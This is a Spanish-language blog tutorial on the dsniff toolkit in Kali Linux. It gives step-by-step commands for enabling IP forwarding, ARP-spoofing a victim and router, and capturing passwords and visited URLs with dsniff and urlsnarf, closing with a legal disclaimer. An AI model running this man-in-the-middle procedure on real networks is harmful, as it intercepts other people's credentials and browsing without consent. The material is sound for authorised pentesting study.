dsniff: Auditoría y Pentesting de Red

 

 https://www.onlinetis.com

dsniff: Auditoría y Pentesting de Red

dsniff es una de las colecciones de herramientas más clásicas y potentes en Kali Linux para realizar auditorías de red y pruebas de penetración (pentesting). No es un solo programa, sino un conjunto de utilidades diseñadas para interceptar datos en una red local (LAN).

Aquí tienes una guía detallada sobre qué es y cómo se usa.


¿Qué es dsniff?

Desarrollado originalmente por Dug Song, su función principal es el sniffing (escucha) de red enfocado en contraseñas. A diferencia de Wireshark, que captura todo el tráfico, dsniff está programado para detectar protocolos específicos (como FTP, Telnet, HTTP, POP, etc.) y extraer automáticamente las credenciales.

Herramientas principales del paquete:

  • dsniff: El rastreador de contraseñas principal.

  • arpspoof: Engaña a las víctimas para que envíen su tráfico a través de tu máquina (ARP Poisoning).

  • dnsspoof: Falsifica respuestas DNS para redirigir a un usuario a una web maliciosa.

  • urlsnarf: Muestra en tiempo real todas las URLs que los usuarios están visitando.

  • filesnarf: Recupera archivos que se están enviando por la red (vía NFS).

  • msgsnarf: Captura mensajes de chats (protocolos antiguos).


Cómo usar dsniff en Kali Linux (Paso a paso)

Para interceptar tráfico en una red moderna con switches, primero debes "ponerte en medio" de la comunicación mediante un ataque Man-in-the-Middle (MitM).

1. Preparar el sistema

Primero, debes habilitar el reenvío de IP (IP Forwarding) para que el tráfico de la víctima pase por tu equipo y llegue a internet sin que sospechen nada.

Bash
echo 1 > /proc/sys/net/ipv4/ip_forward

2. Ejecutar arpspoof

Supongamos que la IP de la víctima es 192.168.1.10 y el router es 192.168.1.1. Ejecutamos dos comandos (en terminales separadas) para interceptar el tráfico de ida y vuelta:

  • Hacerse pasar por el router ante la víctima:

    arpspoof -i eth0 -t 192.168.1.10 192.168.1.1

  • Hacerse pasar por la víctima ante el router:

    arpspoof -i eth0 -t 192.168.1.1 192.168.1.10

3. Ejecutar el capturador

Una vez que el tráfico fluye a través de tu Kali, abres una tercera terminal y ejecutas la herramienta que desees:

  • Para capturar contraseñas:

    dsniff -i eth0

  • Para ver qué páginas web visitan:

    urlsnarf -i eth0


Fortalezas y Limitaciones

CaracterísticaDetalle
EfectividadExcelente en redes antiguas o protocolos sin cifrar (HTTP, FTP).
SimplicidadMuy fácil de usar comparado con herramientas modernas como Bettercap.
Limitación (HTTPS)No puede descifrar tráfico HTTPS/SSL por sí solo. Hoy en día, la mayoría de la web usa cifrado, por lo que dsniff verá datos cifrados.
DetecciónEl ARP Spoofing es ruidoso y puede ser detectado por sistemas IDS (Sistemas de Detección de Intrusos).

Aviso de Seguridad: El uso de estas herramientas en redes sin autorización es ilegal. Esta información tiene fines exclusivamente educativos y de auditoría ética.

Entradas populares de este blog

Hacking y ciberseguridad en kali linux con Fping

Hacking y ciberseguridad en kali linux con atk6-thcping6

Como utilizar Fierce en kali linux